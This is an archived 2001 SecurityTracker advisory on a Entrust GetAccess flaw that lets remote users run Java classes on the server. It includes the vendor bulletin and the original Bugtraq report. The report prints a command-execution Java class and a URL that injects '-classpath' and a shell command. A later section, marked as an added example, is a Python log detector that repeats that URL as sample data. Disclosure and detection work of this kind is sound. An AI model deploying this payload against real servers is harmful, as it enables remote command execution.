SecurityTracker.com
Category:   Application (Security)  >   GetAccess
Vendors:   Entrust
(Entrust Releases Fix) Re: Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server
SecurityTracker Alert ID:  1002126
SecurityTracker URL:  http://securitytracker.com/id/1002126
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 1 2001
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  

Description:   A vulnerability was reported in Entrust's GetAccess single sign-on software that allows remote users to start Java programs that reside on the GetAccess server.

The vulnerability is reportedly due to the lack of input validation in the login modules.

To trigger this vulnerability, the remote user must identify an exploitable GetAccess Java class (a class that accepts input parameters). Then, the remote user can access a URL to cause the Java program to be executed.

An example URL that will execute the 'cmd.class' Java class (which is not part of Entrust's GetAccess) is:

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

When the remote user accesses this URL, the GetAccess server will run "/whereever/cmd.class" and execute "/bin/ls -alsi".
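
A defender's view of the request described above, as an added example that is not part of the advisory or of Entrust's code: a Python log check that flags requests to `*.gas.bat` scripts whose extra path information decodes to whitespace or Java launcher options. The log format, regexes, function names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format: client ... "METHOD target HTTP/x.y" ...
LOG_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')
# Assumption: GetAccess CGI scripts are named *.gas.bat, as in the advisory.
SCRIPT_RE = re.compile(r'^.*?\.gas\.bat(?P<extra>/.*)?$', re.IGNORECASE | re.DOTALL)
# Java launcher options that have no business in a URL path.
JVM_OPTION_RE = re.compile(r'(?:^|\s)-(?:classpath|cp|jar|D\S+|X\S+)(?=\s|$)')

def normalize(path, rounds=3):
    """Percent-decode a few rounds so nested encodings are inspected too."""
    for _ in range(rounds):
        path = unquote(path)
    return path

def inspect_path(raw_path):
    """Return the reasons a request path looks like argument injection."""
    match = SCRIPT_RE.match(normalize(raw_path.split("?", 1)[0]))
    if not match or not match.group("extra"):
        return []  # not a GetAccess script, or no extra path info
    extra = match.group("extra")[1:]
    reasons = []
    if re.search(r"\s", extra):
        reasons.append("whitespace in path info")
    if JVM_OPTION_RE.search(extra):
        reasons.append("JVM option in path info")
    return reasons

def scan(lines):
    """Return (client, target, reasons) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := inspect_path(m.group("target"))):
            hits.append((m.group("client"), m.group("target"), reasons))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2001:09:00:01 +0200] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 512',
    '192.0.2.44 - - [01/Aug/2001:09:00:07 +0200] "GET /sek-bin/login.gas.bat/'
    'x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi HTTP/1.0" 200 2048',
    '192.0.2.12 - - [01/Aug/2001:09:00:09 +0200] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for client, target, reasons in scan(SAMPLE_LOG):
        print(client, target, "; ".join(reasons))
```

The same two conditions can serve as a reject rule in front of the scripts: a login CGI has no legitimate reason to receive whitespace or `-classpath` in its path.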

Impact:   A remote user can start Java programs that reside on the GetAccess server.
Solution:   The vendor has released a fix. See the Source Message for the appropriate vendor URLs for obtaining the fix.
Vendor URL:  www.entrust.com/getaccess/
Cause:   Input validation error
Underlying OS:   UNIX (Solaris - SunOS), Windows (NT)

Message History:   This archive entry is a follow-up to the message listed below.
Jul 28 2001 Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server



 Source Message Contents

Date:  Wed, 1 Aug 2001 09:04:10 +0200
Subject:  FW: Entrust - getAccess


I did not see Entrust's answer posted to bugtraq so I'm sending it.
Pavel M.
-----Original Message-----
From: GetAccess Support [mailto:getaccess.support@entrust.com]
Sent: July 30, 2001 16:37
To: 'MARTAK,PAVEL (HP-Czechia,ex1)'
Subject: RE: Entrust - getAccess


Good morning Pavel. 
I've included the press release and patch details below. Please let me know
if you need clarification. 
Sincerely, 
Jeff 
Entrust Security Bulletin  E01-001 
================================== 
Subject: Entrust GetAccess(tm) CGI Script Vulnerability 
Originally posted: July 27, 2001 
Summary 
======= 
An internet newsgroup posting on BUGTRAQ has identified a vulnerability in
Entrust GetAccess that could allow unauthorized execution of Java programs
installed on GetAccess web servers. This vulnerability has been confirmed by
Entrust and a patch is forthcoming. 
Detailed information on this issue has been posted to the Entrust customer
extranet on both the Entrust GetAccess Portal
(https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html)
and the Entrust Customer Support Extranet
(https://www.entrust.com/support/resources/recentsecuritynotes.htm).
If you have trouble reaching the portals, please call: within North America
877-754-7878, elsewhere 613-270-3700.  A hotline has been established for
the weekend of July 28th/29th, at +1 613 220 8357.
Affected Software Versions 
========================== 
 - Entrust GetAccess, all versions and platforms 
 - Specifically, servers running the Access Service, administration
application, or runtimes. 
Patch Availability 
================== 
Patches for this vulnerability will be posted to the Entrust customer
support extranet on or before Sunday, July 29th 2001.
================== 
(c) Entrust Inc. 2001 
Jeff McGrath 
Web Security Team 
getAccess Integration 
Entrust, Inc. 
"Securing the Internet" 
Customer Support Phone: 1 877 PKI SUPT 
mailto:support@entrust.com 
http://www.entrust.com 



-----Original Message----- 
From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martak@hp.com] 
Sent: Monday, July 30, 2001 2:51 AM 
To: support@entrust.com 
Subject: FW: Entrust - getAccess 


This was announced in BUGTRAQ. 
PavelM 
-----Original Message----- 
From: rudi carell [mailto:rudicarell@hotmail.com] 
Sent: July 27, 2001 13:34 
To: BUGTRAQ@SECURITYFOCUS.COM 
Subject: Entrust - getAccess 



hola friends, 
getAccess[tm] is used as a single-sign-on system often used for large 
internet-portals. 
--- snip (http://www.entrust.com) --- 
Entrust GetAccess[tm] offers the most comprehensive solution for 
consistently deploying and enforcing 
basic and enhanced security across online applications, from Web browsers, 
to enterprise applications and 
legacy database systems. 
--- snip --- 
problem description: 
due to missing input-validation it is possible to run(start) java-programs 
on the "getaccess"-machine. 
combined with publicly accessible uploads or any other possibility to create 
class-files on the server this vulnerability could be used to run arbitrary 
system commands on the target machine (or change getAccess parameters and 
steal any user account you want BTW). 
it should also be possible (but not proven yet) to exploit default-, install- 
or demo classes within Java or getAccess which would make the 
file-upload(creation) part unneeded! 
(uninstall.class is very likely an effective DOS) 


Example: 
find exploitable getAccess-class (one which accepts params!) or upload a 
"command" program: 
--- cut here (example cmd.java) --- 
import java.io.*;

public class cmd {
    public static void main(String args[]) {
        String s = null;  // current line of process output
        try {
            // run args[0] with args[1] appended as its argument string
            Process p = Runtime.getRuntime().exec(args[0] + " " + args[1]);
            BufferedReader stdInput = new BufferedReader(
                new InputStreamReader(p.getInputStream()));
            BufferedReader stdError = new BufferedReader(
                new InputStreamReader(p.getErrorStream()));
            // emit a CGI header, then relay stdout and stderr to the client
            System.out.println("Content-type: text/html\n\n");
            while ((s = stdInput.readLine()) != null) { System.out.println(s); }
            while ((s = stdError.readLine()) != null) { System.out.println(s); }
            System.exit(0);
        } catch (IOException e) {
            e.printStackTrace();
            System.exit(-1);
        }
    }
}
--- cut here --- 


later then .. a http-request to : 
http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi 
.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi" 


Summary: 
object: *.gas.bat  (all the getAccess cgi-shell-scripts) 
class: input validation 
remote: yes 
vendor: has been informed with a separate e-mail ( entrust@entrust.com ) 


(and BTW. i would NEVER EVER recommend to use shell-scripts for 
authentication purposes!) 


nice day, 


rC 
rudicarell@hotmail.com 
security@freefly.com 
http://www.freefly.com/security/ 









Copyright 2013, SecurityGlobal.net LLC